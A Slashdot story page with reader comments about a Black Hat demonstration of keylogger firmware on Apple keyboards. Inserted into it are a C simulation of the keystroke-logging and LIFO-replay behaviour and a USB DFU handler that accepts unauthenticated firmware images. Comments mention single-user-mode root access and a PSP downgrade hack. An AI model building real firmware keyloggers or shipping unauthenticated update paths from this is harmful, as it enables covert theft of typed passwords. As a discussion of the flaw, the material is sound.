
Apple Keyboard Firmware Hack Demonstrated

Anonymouse writes with this excerpt from SemiAccurate: "Apple keyboards are vulnerable to a hack that puts keyloggers and malware directly into the device's firmware. This could be a serious problem, and now that the presentation and code (PDF) is out there, the bad guys will surely be exploiting it. The vulnerability was discovered by K. Chen, and he gave a talk on it at Black Hat this year (PDF). The concept is simple: a modern Apple keyboard has about 8K of flash memory, and 256 bytes of working RAM. For the intelligent, this is more than enough space to have a field day. ... The new firmware can do anything you want it to. Chen demonstrated code which, when you put in a password and hit return, starts playing back the last five characters typed in, LIFO. It is a rudimentary keylogger; a proof of concept more than anything else. Since there is about 1K of flash free in the keyboard itself, you can log quite a few keystrokes totally transparently."
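
A host-side simulation of the behaviour the excerpt describes, added here as an illustration; it is not Chen's code and not Apple firmware. Keystrokes are appended to a 1 KB array standing in for the spare flash, a five-entry ring in RAM keeps the most recent characters, and on Enter the last five are injected back in reverse (LIFO) order. Key codes are plain ASCII bytes rather than USB HID usages, and the `kb_` names, the buffer sizes and the "stop logging when the page is full" policy are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Budget from the excerpt: about 1 KB of spare flash, 256 bytes of RAM. */
#define LOG_FLASH_SIZE 1024
#define PLAYBACK_COUNT 5
#define KEY_ENTER 0x0A          /* ASCII newline stands in for the HID Enter usage */

/* Simulated spare flash page the keylogger appends to (assumed layout). */
static uint8_t log_flash[LOG_FLASH_SIZE];
static uint16_t log_len;

/* RAM ring of the most recent keystrokes: five bytes plus two indices. */
static uint8_t recent[PLAYBACK_COUNT];
static uint8_t recent_head;     /* next slot to write */
static uint8_t recent_count;    /* valid entries, at most PLAYBACK_COUNT */

void kb_reset(void)
{
    memset(log_flash, 0xFF, sizeof log_flash);  /* erased flash reads as 0xFF */
    log_len = 0;
    recent_head = 0;
    recent_count = 0;
}

/* Called once per key the matrix scanner reports. Keystrokes the implant
 * wants to inject are written to 'out'; the return value is how many, so
 * the HID report path can send them after the real key. */
size_t kb_on_key(uint8_t key, uint8_t *out, size_t out_cap)
{
    if (key == KEY_ENTER) {
        size_t emitted = 0;
        /* Walk backwards from the newest entry: LIFO playback. */
        for (size_t i = 0; i < recent_count && emitted < out_cap; i++) {
            uint8_t idx = (uint8_t)((recent_head + PLAYBACK_COUNT - 1 - i) % PLAYBACK_COUNT);
            out[emitted++] = recent[idx];
        }
        recent_count = 0;       /* fresh window for the next field */
        recent_head = 0;
        return emitted;
    }
    recent[recent_head] = key;
    recent_head = (uint8_t)((recent_head + 1) % PLAYBACK_COUNT);
    if (recent_count < PLAYBACK_COUNT)
        recent_count++;
    if (log_len < LOG_FLASH_SIZE)   /* assumed policy: stop when the page is full */
        log_flash[log_len++] = key;
    return 0;
}

/* Convenience: type a whole string, return the total number of injected bytes. */
size_t kb_type_string(const char *keys, uint8_t *out, size_t out_cap)
{
    size_t total = 0;
    for (; *keys; keys++)
        total += kb_on_key((uint8_t)*keys, out + total, out_cap - total);
    return total;
}

uint16_t kb_log_len(void) { return log_len; }
const uint8_t *kb_log(void) { return log_flash; }
```

Typing `password` followed by Enter yields the five injected bytes `drows`, and all eight characters sit in the simulated flash page; the whole thing needs seven bytes of RAM state, which is why the 256-byte figure in the excerpt is not a constraint.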

  • by TheRaven64 ( 641858 ) on Saturday August 01, 2009 @01:36PM (#28910179) Journal
    It's a USB keyboard. That means that it communicates with the host via quite a complex protocol. A keyboard is not just a 'send a specific 8-bit signal when each button is pressed or released' device anymore. The amount of logic needed is not very large, but it's a lot more than a PS/2-style keyboard needed. The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.
  • Re:Huh?? (Score:5, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @01:37PM (#28910187)

    Modern peripherals have microcontrollers that are basically tiny computers all on one chip. The have program flash, data registers, and sometimes data flash or eeprom memory. They are basically small computers about a $1.00 a pop, and are generally more affordable than custom silicon for most low-speed applications (i.e. less than 20 MIPS).

  • Re:What's next? (Score:4, Informative)

    by unfunk ( 804468 ) on Saturday August 01, 2009 @01:39PM (#28910201) Journal
    I feel somewhat obliged to point out that the Sony PSP is vulnerable to a battery hack. If you put in a certain battery, you can then downgrade the system's firmware and play pirated games etc
  • by Anonymous Coward on Saturday August 01, 2009 @01:42PM (#28910227)

    I wouldn't be surprised. Modern gaming devices with programmable buttons often store those macros on the device itself, (e.g. the N52te) in order to allow it to work on any computer it's plugged into without needing the extra software - all you need the software for is to program it.

  • by confidential ( 23321 ) on Saturday August 01, 2009 @01:49PM (#28910311)

    The firmware could have been in ROM, but these days Flash is about as cheap as ROM and gives you the option of distributing fixes if you find bugs after the device ships.

    Two such examples of exactly that:

    1. Aluminum Keyboard Firmware Update (desktops) [apple.com]
    2. MacBook, MacBook Pro Keyboard Firmware Update (portables) [apple.com]

    The only news here is that the same mechanism of installing these updates is able to have other third party software installed in their place as well.

  • by TheRaven64 ( 641858 ) on Saturday August 01, 2009 @01:52PM (#28910333) Journal
    No, USB DMAs can only be initiated from the host (it's a client-server protocol, remember). A USB device has to trick the driver into starting a DMA, which is probably difficult for a keyboard to do without pretending to be some other kind of device. FireWire, on the other hand, allows one device to initiate a DMA request on another and it is up to the driver to block this.
  • Re:Makes me glad... (Score:3, Informative)

    by alen ( 225700 ) on Saturday August 01, 2009 @01:57PM (#28910397)

    probably a lot of keyboards, but Apple keyboards are probably the largest block of a single identifiable brand out there. everyone probably uses OEM'd logitechs but those are probably customized to each OEM

  • by Anonymous Coward on Saturday August 01, 2009 @02:36PM (#28910755)

    All USB keyboards are vulnerable. The blame here rests on the USB Device Firmware Update Specification [usb.org], which specifies how firmware updates are supposed to work. Hint: there's no security. The only reason this makes news at all is because it has the word "Apple" in the title.

    Spec compliant, secure: choose one. USB was designed for single user computers without security in mind. The only way to solve this (partially) with existing hardware would be to block access to hardware devices from applications running as non-root users, which is fundamentally contrary to the desire to get device drivers out of the kernel for stability. Short of that, this can only be solved by putting a more powerful CPU in the keyboard controller so that it can do a signature check on its own firmware.
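
To make the point of the comment above concrete, here is an added example, not from the page, the USB-IF or any vendor firmware, of a minimal device-side handler for the USB DFU 1.1 class requests. The request codes, state names and the six-byte GETSTATUS reply follow the specification; everything else (the image size, the `dfu_` helper names, treating the device as not manifestation-tolerant) is this example's own assumption. The thing to notice is the manifestation step: the staged image is copied into place, and nowhere in the exchange does the device learn anything about who sent it, which is why a signature check has to be added by the vendor on top of the protocol.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* DFU class request codes (USB DFU 1.1, table 3.2). */
enum { DFU_DETACH = 0, DFU_DNLOAD = 1, DFU_UPLOAD = 2, DFU_GETSTATUS = 3,
       DFU_CLRSTATUS = 4, DFU_GETSTATE = 5, DFU_ABORT = 6 };

/* Device states (USB DFU 1.1, section 6.1.2). */
enum { appIDLE = 0, appDETACH = 1, dfuIDLE = 2, dfuDNLOAD_SYNC = 3,
       dfuDNBUSY = 4, dfuDNLOAD_IDLE = 5, dfuMANIFEST_SYNC = 6, dfuMANIFEST = 7,
       dfuMANIFEST_WAIT_RESET = 8, dfuUPLOAD_IDLE = 9, dfuERROR = 10 };

#define bStatus_OK         0x00
#define bStatus_errADDRESS 0x08

/* A USB setup packet as it arrives on endpoint 0. */
struct usb_setup { uint8_t bmRequestType, bRequest; uint16_t wValue, wIndex, wLength; };

#define IMAGE_MAX 8192          /* assumed: the ~8 KB of flash mentioned in the story */
static uint8_t staging[IMAGE_MAX], firmware[IMAGE_MAX];
static size_t staged_len, firmware_len;
static uint8_t state = appIDLE, status = bStatus_OK;

void dfu_reset(void) { state = appIDLE; status = bStatus_OK; staged_len = 0; firmware_len = 0; }
uint8_t dfu_state(void) { return state; }
size_t dfu_firmware_len(void) { return firmware_len; }
const uint8_t *dfu_firmware(void) { return firmware; }

/* Bus reset after DFU_DETACH: the device re-enumerates in DFU mode. */
void dfu_bus_reset(void) { if (state == appDETACH) state = dfuIDLE; }

/* Handle one class request aimed at the DFU interface. 'data' is the OUT data
 * stage (DNLOAD payload); 'reply' receives the IN data stage for GETSTATUS and
 * GETSTATE. Returns 0 to ACK the request, -1 to STALL it. */
int dfu_handle(const struct usb_setup *s, const uint8_t *data, uint8_t *reply, size_t *reply_len)
{
    *reply_len = 0;
    if ((s->bmRequestType & 0x60) != 0x20)       /* bits 6..5 = 01: class request */
        return -1;
    switch (s->bRequest) {
    case DFU_DETACH:                              /* run-time mode only */
        if (state != appIDLE) break;
        state = appDETACH;                        /* nothing asks who the host is */
        return 0;
    case DFU_DNLOAD:
        if (state != dfuIDLE && state != dfuDNLOAD_IDLE) break;
        if (s->wLength == 0) {                    /* zero-length block ends the image */
            if (state == dfuIDLE) break;          /* an empty image is an error */
            state = dfuMANIFEST_SYNC;
            return 0;
        }
        if (staged_len + s->wLength > IMAGE_MAX) { status = bStatus_errADDRESS; break; }
        memcpy(staging + staged_len, data, s->wLength);
        staged_len += s->wLength;
        state = dfuDNLOAD_SYNC;
        return 0;
    case DFU_GETSTATUS:                           /* the host polls here; state advances */
        if (state == dfuDNLOAD_SYNC) {
            state = dfuDNLOAD_IDLE;               /* block "written", ready for the next */
        } else if (state == dfuMANIFEST_SYNC) {
            /* Manifestation: commit the staged image. Nothing checks its origin. */
            memcpy(firmware, staging, staged_len);
            firmware_len = staged_len;
            state = dfuMANIFEST_WAIT_RESET;       /* assumed: not manifestation-tolerant */
        }
        reply[0] = status; reply[1] = reply[2] = reply[3] = 0;  /* bwPollTimeout */
        reply[4] = state;  reply[5] = 0;                         /* iString */
        *reply_len = 6;
        return 0;
    case DFU_GETSTATE:
        reply[0] = state; *reply_len = 1;
        return 0;
    case DFU_ABORT:
        if (state < dfuIDLE || state == dfuERROR) break;
        state = dfuIDLE; staged_len = 0;
        return 0;
    case DFU_CLRSTATUS:
        if (state != dfuERROR) break;
        status = bStatus_OK; state = dfuIDLE; staged_len = 0;
        return 0;
    default:
        break;
    }
    state = dfuERROR;                             /* any protocol error stalls */
    return -1;
}

/* Convenience wrapper that builds the setup packet the way a host would. */
static uint8_t reply_buf[8];
static size_t reply_buf_len;
int dfu_request(uint8_t bRequest, uint16_t wValue, const uint8_t *data, uint16_t wLength)
{
    int to_host = (bRequest == DFU_GETSTATUS || bRequest == DFU_GETSTATE || bRequest == DFU_UPLOAD);
    struct usb_setup s = { (uint8_t)(to_host ? 0xA1 : 0x21), bRequest, wValue, 0, wLength };
    return dfu_handle(&s, data, reply_buf, &reply_buf_len);
}
uint8_t dfu_reply(size_t i) { return i < reply_buf_len ? reply_buf[i] : 0xFF; }
```

The full host sequence is DETACH, bus reset, one DNLOAD per block each followed by a GETSTATUS poll, a zero-length DNLOAD, and a final GETSTATUS that triggers manifestation. The only gate on a DNLOAD is the state machine: a download in run-time mode is stalled, but once the device is in DFU mode any host with control-transfer access to the interface can push an image.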

  • Much easier way... (Score:3, Informative)

    by Longjmp ( 632577 ) on Saturday August 01, 2009 @04:37PM (#28911603)
    I only need two keystrokes to hack a Mac when I have access to its keyboard:
    Cmd - "s"
    Voila, root access. documented here :p Start into single user mode [apple.com]
  • That's not a bug. (Score:3, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @05:12PM (#28911807)

    That *is* a feature. It isn't a hacked battery, it is a battery which is hacked to appear as an authentic internal tool, designed to read a certain area on a memory stick, so sony can quickly restore a problematic psp.

    It was designed that way, and obscured. the 'hack' merely makes that information public and usable.

  • Re:Huh?? (Score:5, Informative)

    by RalphSleigh ( 899929 ) on Saturday August 01, 2009 @05:25PM (#28911885) Homepage

    No, it's your OS's job to decide what pressing keypad-minus does, the keyboard should simply tell the OS that keypad-minus key was pressed

  • Re:Makes me glad... (Score:1, Informative)

    by Anonymous Coward on Saturday August 01, 2009 @08:37PM (#28913159)

    Because Apple and a couple of Logitech keyboards are the only ones to use flash.
